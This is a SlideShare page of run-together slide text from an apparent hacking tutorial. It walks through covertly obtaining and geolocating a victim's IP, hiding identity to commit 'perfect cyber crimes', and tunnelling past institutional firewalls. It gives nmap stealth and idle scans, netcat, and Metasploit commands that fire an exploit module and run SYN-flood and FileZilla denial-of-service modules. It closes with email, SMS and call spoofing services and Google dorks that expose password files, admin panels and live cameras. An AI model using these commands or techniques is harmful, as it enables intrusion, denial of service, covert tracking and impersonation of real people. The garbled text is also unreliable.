is a hacker ?A Hacker is NOT a criminalA hacker is        Somebody who thinks outside the box.        Wants to test his li...
Class B:               XXX.YY                      AA.BB    Class C:               XX.YY.AA                    BBSpecial I...
How to trace an IP address to exact geographical location ?http://visualroute.visualware.com/NeoTrace pro http://neotrace-...
In a NAT enabled system, a person from outside, first have to hack into the router    before trying to get into the intern...
How TOR is better than proxy servers ?TOR is available as free download from http://www.torproject.org.in/How to unblock T...
-      Both cases requires an IP address and port number.          Goto skype tools options connection settings  proxy ...
Now you can use college computer to access everything on your home network includingunrestricted internet. Ex:- Tunnelizer...
How to execute the attackPing sweepingPing is used to check the connectivity between your computer and the remote computer...
Ping statistics for 65.61.137.117:   Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in m...
www.dnsstuff.comwww.dnstools.comwww.zoneedit.com/lookup.htmlPort Scanning:-Port scanning is the art of scanning a remote t...
Step 1: Client === > FIN Packet ===== > HostStep 2: Host == > ACK Packet ===== > Client(Reverse also needs to happen)It is...
Step 3: Probe the fragment ID of Zombie again. If fragment ID increased by 1, then porton victim is open, else it is close...
NetCatNetcat is one of the most popular and widely used networking utilities on the internet. Itcan be used to read and wr...
known responses to determine the OS running on the target system. Typically whileanalyzing responses, the following fields...
loopholes and vulnerabilities for various platforms and software. It allows you toautomatically test a remote system for a...
>nmap –sT –p 1-100 –Pn www.victim.com          Daemon Banner Grabbing using metasploit          >use auxiliary/scanner/pop...
Google DorksGoogle Hacking or Google Dorking is the use of clever google search tags or commands totry and reveal sensitiv...
Upcoming SlideShare
Loading in …5
×

Hacking

7,967 views

Published on

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
7,967
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
24
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Hacking

  1. 1. is a hacker ?A Hacker is NOT a criminalA hacker is Somebody who thinks outside the box. Wants to test his limits Wants to try things that are not in the manual Has unlimited curiosity Discovers unknown features about technology Dedicated to knowledge Beleives in stretching the limits Highly creativeHackers vs. CrackersHackers Crackers Very knowledgeableGood guy Bad guyHelp improve security Want to cause cyber destructionStrong ethics No ethicsHave prior permission No prior permissionJob opportunities: Banking, Telecom, IT/IteS/BPO/KPOs, ecommerce, military, police, retailindustry, etc.Hacking into a computer is just like breaking into a house.Steps of a hacker:1. Identify the victimInformation Gathering2. Find a loophole/network reconnaissance3. Actual attack/hack/break in4. Escape without a trace Identify the victim:- Anatomy of an IP address:- An IP address is something anologous to your mobile phone number. It is something which uniquely identifies your presence on the internet. It is a 32-bit address which is divided into four fields of 8-bit each containing numbers betwen 1 and 255. By simply studying an IP address, we can easily reveal a lot of information about the network the victim belongs to. Different classes of an IP address Class Range Network/Host IDs A 0.0.0.0 to 126.255.255.255 NETWORK.HOST.HOST.HOST B 128.0.0.0 to NETWORK.NETWORK.HOST.HOST 191.255.255.255 C 192.0.0.0 to NETWORK.NETWORK.NETWORK.HOST 223.255.255.255 D 224.0.0.0 to Multicast IP addresses. They are IP addresses set 239.255.255.255 aside for special purposes E 240.0.0.0 to Not in use 255.255.255.255 XX.YY.AA.BB network ID host ID Class A: XXX YY.AA.BB
  2. 2. Class B: XXX.YY AA.BB Class C: XX.YY.AA BBSpecial IP addresses:Use IP addressLocal loopback address 127.0.0.1Private IP Address: to be used for computers Class A Networkinside a private network or LAN 10.0.0.0 – 10.255.255.255 Class B Network 172.16.0.0 – 172.31.255.255 Class C Network 192.168.0.0 – 192.168.255.255Converting IP addresses into different formats:Format IP AddressDecimal 171.67.215.200Binary 10101011.01000011.11010111.1001000Octal 253.103.327.310Hexadecimal 00AB.0043.00D7.00C8http://www.csgnetwork.com/ipaddconv.htmlWindows Scientific calculatorTracking victim IP address www.spypig.com – use to find out the IP address of the victim via sending a tracking image to victim„s email id.http://www.getnotify.com/http://didtheyreadit.com/http://www.politemail.com/ - commonly used in corporate worldhttp://readnotify.com/ - creates tracking file like a word or pdf file.How to trace an email back to its sender ?1st technique:-Step 1: Open email headers (Show original option in gmail. In yahoo. Email settings->fullheaders)Step 2: Analyze email headers Manually (the headers contain IP address) or automatically(2nd technique)using emailtrackerpro (http://www.emailtrackerpro.com/)3rd technique:- http://blasze.com/iplog/Simply send a crafted link to your friendNow we have ORIGINAL URL and VICTIM URLDISGUISED URL: using URL shortening website s www.bit.ly www.goo.gl4th technique: www.whatismyipaddress.comHow to find out victim„s IP address using a website ?Step 1: create your own website/webpage/blogStep 2: in the homepage, write a java code to extract IP address and MAC address of victimStep 3: Invite the victim(s)5th technique: Using chatting software (not a reliable technique though)Setup a chat with victim and put the below command in dos prompt-netstat –n6th technique:- TCPView Software http://technet.microsoft.com/en-us/sysinternals/bb897437.aspxCurrports http://www.nirsoft.net/utils/cports.html
  3. 3. How to trace an IP address to exact geographical location ?http://visualroute.visualware.com/NeoTrace pro http://neotrace-pro.en.softonic.com/3d traceroute http://www.d3tr.de/loriot pro http://www.loriotpro.com/geospider http://oreware.com/viewprogram.php?prog=22http://vtrace.pl/All are online versions of the simple traceroute commandEx: tracert www.indiatimes.comTrace a mobile phone number to its geographical locationhttp://trace.bharatiyamobile.com/Tracking stolen smartphonehttps://www.lookout.com/create a lookout account and register your device.Summary - What to do to be a hacker - What is IP address - How to get somebody„s IP address - How to trace the IP address„s exact geographic location - How to track a mobile phone - How to trace a lost smartphone Internal and External IP addresses Introduction to NAT (Network Address Translation) When the internet was initially created, there was no shortage of any IP addresses. However, as internet usage spread, an acute shortage of IP addresses was created worldwide This led to emergence of Network Address Translation. Advantages of NAT are- It Reduces need for IP addresses, Improves security and Easier implementation of networks In a NAT system, nobody from outside world will know IP address of an internal system. - Identity is protected - No direct connection
  4. 4. In a NAT enabled system, a person from outside, first have to hack into the router before trying to get into the internal system. Depending upon the entension number entered, the lookup table is used to route the call to the appropriate internal system. How to find out internal IP address & external IP address ? Internal IP address can be found using netstat –n ipconfig /all External IP address can be found on http://whatismyipaddress.com/ How to hide your IP address ? by using a proxy server http://www.anonymizer.ru – online tool/web proxy Most of the russian proxy websites are free None of them maintain any record or log fileshttp://samair.ru/proxy/http://www.hidemyass.com/ - uses URL encoding so that ”facebook” does not appear onURLTorrents:-How torrents are blocked ? - Disabling torrent clients Solution- http://www.bitlet.org/ - Block download of .torrent extension files Solution- http://www.torrent2exe.com/ http://txtor.dwerg.net/The perfect cyber crimes are commited by effectively hiding your presence on the internet.Your presence on the internet can be spoofed or tricked by hiding your IP address as well asby hiding your system„s MAC address plus with a lethal technique called war driving.Difference between IP address and MAC addressIP address MAC addressGiven by ISP/Network Given by manufacturer and it is static2 types- static IP address and dynamic IP Your hardware Network Interface Card (NIC)address like ethernet card, wifi card, bluetooth, etc has its unique MAC addressDOS command to get your internal IP DOS command to get their respective MACaddress is– addresses isIpconfig /all getmacTo get your external IP address, open yourweb browser and gotohttp://whatismyipaddress.com/The perfect cyber crimes are commited by-Proxy bouncing – IP hiding or IP spoofing (Ultrasoft)MAC spoofing – (MACAddressChanger, MacMakeUp-doesnt work on windows XP,MadMacs, EtherChange, BWmachak)War driving – driving on the streets with a laptop and scan for unprotected Wifi networks(inssider, Netstumbler, Kismet, Airsnort and War Chalking)Onion routing protocol – provides anonymous, secure, encrypted access to the internet.Ex- TOR
  5. 5. How TOR is better than proxy servers ?TOR is available as free download from http://www.torproject.org.in/How to unblock TOR ?- Change the name of the downloaded TOR exe file- In the TOR„s proxy settings, change the default port number- Add bridge relay server URLs to TOR from https://bridges.torproject.org/Bridge relays (or "bridges" for short) are Tor relays that arent listed in the main directory.Since there is no complete public list of them, even if your ISP is filtering connections to allthe known Tor relays, they probably wont be able to block all the bridges.Incase https://bridges.torproject.org/ is blocked, another way to find public bridge addressesis to send mail to bridges@torproject.org with the line "get bridges" by itself in the body ofthe mail. However, so we can make it harder for an attacker to learn lots of bridgeaddresses, you must send this request from an email address at one of the followingdomains: gmail.com yahoo.com Types of Proxy servers – SOCKS and HTTP HTTP proxy servers – allow you to bypass filtering mechanisms and access blocked content. User sends HTTP request to proxy server, who then reads the Host header in the HTTP request, connects to the target server and transmits back whatever data the server sends back. Usually, it works only with HTTP apps. Ex:- anonymizer.com SOCKS proxy servers allows you to bypass filtering mechanisms and access blocked content. SOCKS is a protocol that transmits data between source and destination cia a proxy server without reading any of the contents. Hence it works with all protocols like TCP, UDP, etc. And will allow you to use all applications (like mail, browsing, downloading files, etc.) . Ex- TOR TOR works on port number 9051. Using TOR, you can hide yourself in skype or any other instant messenger, There are 2 ways to do this- - Connect the application to TOR - Connect the application to a proxy
  6. 6. - Both cases requires an IP address and port number. Goto skype tools options connection settings  proxy Give proxy IP as 127.0.0.1 and port number 9051.Tools:-Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep proxies all in the samesession. It supports both HTTP and SOCKS. You just need to feed this software with theproxy servers.SOCKSCHAIN http://ufasoft.com/socks/ Connects you to a chain of SOCKS or HTTPproxies (Proxy bond)ProxyFire http://www.proxyfire.net/Ultrasurf https://ultrasurf.us/ - Anonumous browsing from your pendrive. It encryptsconnection, hides your IP and unblocks stuff. You can even configure a proxy inside ultrasurfif your college/organization requires a proxy server to connect to.Virtual Private Network (VPN)A VPN is a group of computers connected privately through a public network like Internet.Usually VPN services gives you an encrypted, secure and anonymous communicationchannel. Popular VPN services are:- HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPNand GoTrusted.VPN is like a proxy but in a private network. If Ultrasulf/SOCKS or proxy services doesn„twork as expected, a VPN service is used. VPN servers, like proxy servers can be in differentparts of the world. Theseservers provide better spped than proxy serversVPNs are used to access blocked videos in Internet. Ex:- http://www.hidemyass.com/vpn/HTTP TunnelingAssume that inside your network, FTP, some websites/torrents are blocked by your firewall.But no firewall blocks all traffic. HTTP tunneling disguises blocked sites as regular/allowedhttp traffic. Let us assume that in your college/company, FTP protocol (port 21) is blocked ortorrents are blocked. The firewall only allows HTTP traffic on port 80, all other ports areblocked. It is possible to encapsulate FTP or torrent traffic inside HTTP protocol and bypassthe firewall.Step 1:- Install HTTP tunneling software server on your home or outside computer that hasunrestricted access.Step 2:- Install HTTPTunneling software client on your college/office computer that hasrestricted access.Step 3:- Now your connection diagram is as followsYOU FTP or torrent software HTTP Tunneling client  sends FTP or torrent trafficencapsulated into HTTP protocol via port 80 to bypass firewall  HTTP Tunneling server onHome Computer  FTP or Torrent Destination
  7. 7. Now you can use college computer to access everything on your home network includingunrestricted internet. Ex:- Tunnelizer, HTTPort and HTTPTunnel are good HTTPTunnelingtools.Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2 wayHTTP TunnelingHome networkcollege networkSome cool stuffs:-PSIPHON (http://psiphon.ca/)Proxy workbench (http://proxyworkbench.com/)Reverse text:- http://www.textmechanic.com/Upside down text (http://www.upsidedowntext.com/)Proxy Workbench (http://proxyworkbench.com/)People Hacking:-Whatever we do online are tracked in some website.http://www.pipl.com/http://www.spokeo.com/http://www.anywho.com/http://www.intelius.com/google maps street viewgoogle earth satellite viewNetwork reconnaissance and Information gathering2nd step to hackingNetwork reconnaissance is the process of finding out as much information about victim aspossible. Typically an attacker is trying to find out the following about the victim- - Victim is online/offline - Network topography - DNS information - List of open ports - DNS information - Names and versions of software running open ports - OS details - Possible security loopholes Techniques:- PING sweeping, Traceroute DNS related tools LAN surveyors Port scanning Daemon Banner Grabbing OS fingerprinting Security Auditing
  8. 8. How to execute the attackPing sweepingPing is used to check the connectivity between your computer and the remote computer(whether you are online, whether victim is online and whether there is connectivitybetween both of you)Ping is used for Denial of Service (DoS) attacks, OS and firewall detection purposes.Popular sweeping tools are nmap (http://nmap.org/)http://ping.eu/Ping using Nmap:-nmap –sn –v www.google.com(-sn means No port scan)Ping by bypassing firewallnmap –sn –v –Pn www.google.comInstead of using ICMP echo requests, it connects to port 80-sn === perform ping. -v == verbose mode (gives you detailed information about what itis doing)ICMP echo requests/replies can easily be blocked by a firewall. Hence, -Pn optionattempts to connect to the website or port 80 of www.google.comPing sweeping allows you to ping entire range of computersnmap –sn –v 203.94.1.0-255Angry IP scanner – ping sweeping toolTracerouteWhen data packets travel from source to destination system, then they do not alwaystake the same path, Traceroute is a tool that allows you to trace a path between twosystems. Originally it was designed for network troubleshooting but commonly used for- OS detection- Firewall detection- Network topology information- Geographical location of the target systemHow to guess the Operating system running on a remote computer by simply using PINGand TRACEROUTE ?Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in acomputer or network. TTL value gets reduced by one everytime data packet reaches arouter. The initial TTL value is determined by the operating system. If I am able to findout the initial TTL value of a data packet sent by the victim, I can guess the operatingsystem running on the victim Different Operating systems have different TTL values.Final TTL value = Initial TTL value-No. of routersSteps to know what OS www.altoromutual.com is running (it is legal to hack this URL)Step 1:-E:Documents and SettingsSYS>ping www.altoromutual.comPinging altoromutual.com [65.61.137.117] with 32 bytes of data:Reply from 65.61.137.117: bytes=32 time=290ms TTL=117Reply from 65.61.137.117: bytes=32 time=290ms TTL=117Reply from 65.61.137.117: bytes=32 time=289ms TTL=117Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
  9. 9. Ping statistics for 65.61.137.117: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 289ms, Maximum = 290ms, Average = 289msInference:- Final TTL value = 117117 = Initial TTL value – No. of router hopsStep 2:-E:Documents and SettingsSYS>tracert www.altoromutual.comTracing route to altoromutual.com [65.61.137.117]over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms 192.168.1.1 2 22 ms 23 ms 25 ms ABTS-KK-Static-001.228.178.122.airtelbroadband.in [122.178.228.1] 3 20 ms 21 ms 21 ms ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217] 4 20 ms 21 ms 21 ms AES-Static-025.102.22.125.airtel.in [125.22.102.25] 5 185 ms 178 ms 176 ms 125.62.187.189 6 177 ms 178 ms 178 ms ldn-b2-link.telia.net [213.248.71.17] 7 177 ms 178 ms 178 ms ldn-bb2-link.telia.net [80.91.247.26] 8 290 ms 291 ms 291 ms nyk-bb2-link.telia.net [80.91.248.254] 9 * * * Request timed out. 10 * 290 ms 288 ms rackspace-ic-127247-dls-bb1.c.telia.net [213.248.88.174] 11 290 ms 289 ms 291 ms coreb.dfw1.rackspace.net [74.205.108.52] 12 291 ms 291 ms 291 ms core5.dfw1.rackspace.net [74.205.108.27] 13 290 ms 294 ms 289 ms 67.192.56.19 14 291 ms 289 ms 289 ms 65.61.137.117Trace complete.E:Documents and SettingsSYS>Inference:- Count the number of hops. Eliminate 1st entry (which is source) and lastentry (which is destination) and do not count request timeouts. = 11 router hops FinalTTL value = 113No. of router hops = 11117 = Initial TTL value – 11Initial TTL value = 128Step 3:-Now google search for default TTL values of different Operating Systems.From the URL, http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/TTL value 128 corresponds to some windows based operating system running on victim(www.altoromutual.com)Domain Name ServerA DNS lookup is a query sent by a user (browser or IM or email client) to a DNS serverto convert a particular domain name to its respective IP address.www.whois.netwww.iptools.comwww.betterwhois.com
  10. 10. www.dnsstuff.comwww.dnstools.comwww.zoneedit.com/lookup.htmlPort Scanning:-Port scanning is the art of scanning a remote target system to obtain a list of open virtualports on it that are listening for connections. This is usually one of the first few stepsevery criminal takes.Popular port scanning tools: nmap, strobe, superscan, etc.It allows a criminal to identify any potential entry points into a target computer. Thefollowind covers how to see open ports on some remote computer.Popular Ports:-21 FTP23 Telnet25 SMTP53 DNS80 HTTP110 POP3443 SSL/https513 rloginTCP Packet format:-Flag Types –SYN == Start a new connectionFIN == End a connection existingRST == Error NotificationACK == Data Received SuccessfullyHow are connections established on the Internet ?3 Step/3 Way TCP/IP Handshake (===== > meaning sends)Step 1: Client (me)===== > SYN Packet ====== > Host (Google)Step 2: Host ======== >SYN/ACK Packet====== > ClientStep 3: Client ======= > ACK Packer ==== > HostHoe are connections terminated ?2 steps:-
  11. 11. Step 1: Client === > FIN Packet ===== > HostStep 2: Host == > ACK Packet ===== > Client(Reverse also needs to happen)It is possible to create your own packets using colasoft packet builder (PacketGenerator) and Komadia Packet Crafter which is available as free download on theinternet.TCP CONNECT Port Scan/ TCP Handshake Port Scan:-Port scan establishes a full 3-way TCP/IP Handshake with all ports on the remotesystem.Procedure:-ATTACKER sends SYN Packet to TARGETOPEN:- TARGET sends back a SYN/ACK PacketCLOSED:- TARGET sends back a RST/ACK PacketATTACKER sends ACK/RST Packet back to TARGETAdvantages:- Very accurate, no countermeasuresDisadvantages:- Attacker is Easily Detected/caughtNmap command:-nmap –sT –p1 – 100 –Pn www.altoromutual.com-sT TCP Connect Port Scan-p Port RangeSecond type of scan where detection is difficult is1) TCP SYN Port Scan/Half Open Scan/Stealth Scan.Also known as Half Open scan because only half of the complete 3-way TCP/IPhandshake is executed.ATTACKER sends SYN Packet to TARGETOPEN: TARGET sends back a SYN/ACK PacketNo Third Step (Unlike previous scan). Considered stealth. Can be detected usingPortSentry on Unix platform (http://sourceforge.net/projects/sentrytools/)nmap –sF –p1-100 –Pn www.altoromutual.comNULL/XMAS Port Scan – Stealth but unreliable and varied responsesnmap –sX –p1-100 www.altoromutual.com (all flags set as 1)nmap –sN –p1-100 www.altoromutual.com (all flags set as 0)2) IDLE Port Scan (Blind Port Scanning):Very useful for attackerIt port scans the victim without sending even a single packet to the victim from own IPaddress. Every system has fragment ID number which is a 4 digit number that isincreased by 1 each time a packet is sent by it.Step 1: Probe a zombie machine for their fragment ID.ATTACKER ===== > sends SYN/ACK packet ======= > ZOMBIEZOMBIE ======= > sends back a RST packet with Fragment ID ==== > ATTACKERAssume recorded fragment ID = 1012.Step 2: Send spoofed SYN Packet from zombie to victimOPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increased itsfragment ID by 1 and becomes 1013.CLOSED: Victim sends RST to Zombie who discards RST packet and does not changeits fragment ID.
  12. 12. Step 3: Probe the fragment ID of Zombie again. If fragment ID increased by 1, then porton victim is open, else it is closed.nmap –Pn –p 1-100 –sI <ZOMBIE/Friend‟s IP address> www.altoromutual.com-sI == > idle port scan3) ACK Port Scan/Firewall detection scanNmap –sA –pN –p 1-100 www.altoromutual.comThis type of scan can be used to determine presence of a firewall filtering out datapackets.ATTACKER sends ACK packet to TARGETFIREWALL PRESENT: No responseFIREWALL NOT PRESENT: Target sends back RST Packet.Other command line port scanning tool: scanline, hping3, etc.Countermeasures:- Foolproof countermeasures against port scanning do not exist.- Close as many ports as possible.- Filter out certain packets using firewalls, ACLs and other filters using tools like Scanlogd, BlackICE, Abacus, Portsentry, snort, etc. Daemon Banner Grabbing It helps you confirm your guess about the victim Operating System. Once you get to know list of installed software on victim system, the attacker google searches for installed software vulnerabilities. Daemon banner grabbing: It is the process of getting useful information about the target system by recording the welcome banners of the daemons running on various ports. It can be used to get the following information about the target system o Daemon name and version number o OS information o Most important, to identify possible points of entry nmap –sV –p 1-100 www.altoromutual.com Scanline:- sl –v –bt 1-100 www.altoromutual.com Manual technique using Putty (Telnet client) Telnet to port 80 of victim Close window on exit option should be set as never Type HEAD/HTTP/1.0 and press enter. You will get the victim‟s daemon banner as output. HTTPRecon http://www.computec.ch/projekte/httprecon/ Countermeasures: Edit default daemon message ensuring critical information is not revealed. Misguide attacker by displaying dales daemon banners. Use a long false daemon banner and in the background record information about the attacking client and try to trace him/her.
  13. 13. NetCatNetcat is one of the most popular and widely used networking utilities on the internet. Itcan be used to read and write network connections. It is widely used by both criminalsand system administrators.Netcat is used for-- Listening to a port- Connecting to a port- File transfer- Chatting- Executing applications- Sending spoofed HTTP probes- Proxy servers- Port scanning, etc. It is also used to probe a remote computer for open ports and daemon/software running on the open ports. Netcat commands (command line tool): nc –v www.altoromutual.com 80 HTTP/1.0 Ncat is improved, better version, which comes free with Nmap. ncat –C www.altoromutual.com 80 get http/1.0 ncat –l 127.0.0.1 8080 opens a port on local machine. Open browser and type 127.0.0.1:8080/ Nothing happens in the browser. In the command prompt, ncat managed to record some information about browser. This technique can be used to trace attackers. Transferring files using ncat: ncat –l 7000 > output.txt (opens port 7000 and accepts input on it, which will be saved in output.txt) Ncat 127.0.0.1 7000 <input.txt Operating System (OS) Detection It is important for an attacker to determine what OS is running on the target system. 2 most effective techniques are- Active Fingerprinting Passive Fingerprinting Different OS have different stacks. Hence, different OS responds differently to the same packet sent to it by same system. This difference in response is used as a benchmark of differentiating between various operating systems. Active Fingerprinting: is the process of actively sending data packets to the target system to generate a response, which is then analyzed and compared to the list of
  14. 14. known responses to determine the OS running on the target system. Typically whileanalyzing responses, the following fields & techniques can be useful-TCP Initial Window Size of packetsTTL valuesACK Values of packetsInitial Sequence Number (ISN) valuesHandling of overlapped fragments, etc The attacker can be traced. That means this method is not anonymous.Nmap commands:-nmap –O –v www.altoromutual.comnmap –A –v www.altoromutual.comPassive FingerprintingProblem with active fingerprinting is that it reveals the identity of the criminalhttp://lcamtuf.coredump.cx/p0f3/P0f will try to determine the OS information by simply analyzing the data packets sentby the target system while performing usual and routine communication like if targetvisits your website, sends you a file, etc.p0f –L .p0f –i 4 (interface number)TTL, window size, DF Bit and TOS fields in the reply TCP packet is analyzed to getremote OS.OS Detection CountermeasuresChange the default values of your OS like TTL, ISN, etc.Mislead attacker by configuring default values of some other OS on your system.Use ACLs to filter out unwanted probing packets.Security AuditingIt is a technique of scanning the victim computer for any potential security loopholesthat may exist on it, using which an attacker can hack into it.Tools: Nessus, GFI Languard, Retina Scan, SAINT, Core Impact, NSAuditor (NotFree)Attacking target computer using METASPLOITIn my previous blog, I have covered detailed step by step instructions on how tocollect maximum information about victim in pursuit of getting any possible weakentry points. It is popularly called Vulnerabilities. Once you get any possibleloopholes or vulnerabilities, it is the perfect time to ATTACK!!!Metasploit is an open source framework for penetration testing that allows you to testthe security of a network. It had a built in large database of hundreds of known
  15. 15. loopholes and vulnerabilities for various platforms and software. It allows you toautomatically test a remote system for all these hundreds of security loopholes.EXPLOIT: is a code, software or tool that misuses a vulnerability or loophole on aremote machine to cause malicious results on it.PAYLOAD: is defined as the effect of executing the exploit code and some otherpayload code on a remote machine, which allows a medium of communication to beestablished between the attacker and the victim. It could be in the form ofmodification/deletion of data, getting shell access, file access and others.Each EXPLOIT will support certain type of PAYLOADS.STEPS INVOLVED1. Identify loophole on victim using network reconnaissance, security auditing and penetration testing.2. Select and configure that exploit and various exploit options on metasploit.3. Select victim computer and victim port.4. Select payload you wish to launch with exploit code.5. Launch the attack. Metasploit Commands: >help >banner >connect www.altoromutual.com 80 Get /HTTP/1.0 >ping www.altoromutual.com >show exploits >show payloads >show auxiliary >search type:exploit platform: windows unsafe >info windows/tftp/quick_tftp_pro_mode >use windows/tftp/quick_tftp_pro_mode windows/tftp/quick_tftp_pro_mode>show options windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com windows/tftp/quick_tftp_pro_mode>check windows/tftp/quick_tftp_pro_mode>exploit windows/tftp/quick_tftp_pro_mode>back (exit a module) Port scanning using Metasploit It is possible to port scan a remote computer using metasploit. All nmap commands are valid in metasploit. >search portscan >use auxiliary/scanner/portscan/tcp >use auxiliary/scanner/portscan/syn (SYN port scan) >use auxiliary/scanner/portscan/xmas (XMAS port scan) >use auxiliary/scanner/portscan/ack (ACK port scan) >show options >set RHOSTS www.victim.com >set RPORTS 1-100 >set verbose true >run
  16. 16. >nmap –sT –p 1-100 –Pn www.victim.com Daemon Banner Grabbing using metasploit >use auxiliary/scanner/pop3/pop3_version >set RHOSTS www.victim.com >run Similarly, >use auxiliary/scanner/pop3/http_version >set RHOSTS www.victim.com >run >use auxiliary/scanner/pop3/smtp_version >set RHOSTS www.victim.com >run (SMTP runs on port 25, port 80 is HTTP and port 110 is POP3) Grabbing Email Addresses from a website >search collector >use auxiliary/gather/search_mail_collector >show options >set domain www.victim.com >run TCP flooding using metasploit It is possible to execute a DOS attack against various victims using metasploit >use auxiliary/dos/tcp/synflood >set RHOST www.victim.com >run FileZilla is a popular FTP server based on windows platform. There are 2 exploit modules in metasploit that can be used to execute a DOS attack against some versions of the FileZilla server >use auxiliary/dos/windows/ftp/filezilla_admin_user >set RHOST www.victim.com >run >use auxiliary/dos/windows/ftp/filezilla_server_port >set RHOST www.victim.com >runDisposable email (anonymous): www.hidemyass.com.Email Spoofing: is the art of sending a spoofed email from somebody else‟s email account.www.anonymizer.in/fake-mailerSMS Spoofing: (Paid service but may be worth)http://www.spranked.com/http://www.phonytext.com/Call Spoofing: http://www.mobivox.com
  17. 17. Google DorksGoogle Hacking or Google Dorking is the use of clever google search tags or commands totry and reveal sensitive data about victims like password files, vulnerable servers and others.A google dork, according to a hacker slang is somebody whose sensitive data is revealedwith the use of Google Hacking or Google Dorking.Examples:info:<web address>cache:www.facebook.com password (retrieve old cached copy of webpage)link:www.flyingmachine.co.inallintitle:Loginallintitle:Login+site:timesofindia.comallinurl:password loginallinurl:password login+site:www.google.cominurl:/view.index.shtml (access live cameras)inurl:/view.indexFrame.shtml Axisext:pdf hackingsite:gov inurl:admin loginsite:in inurl:admin loginintitle:intranet inurl:intranet+site:in“Welcome to phpMyAdmin” AND “Create new database”“index of /etc/passwd”Google Hacking Database (GHDB)http://www.hackersforcharity.org/ghdb/Website Mirroring

×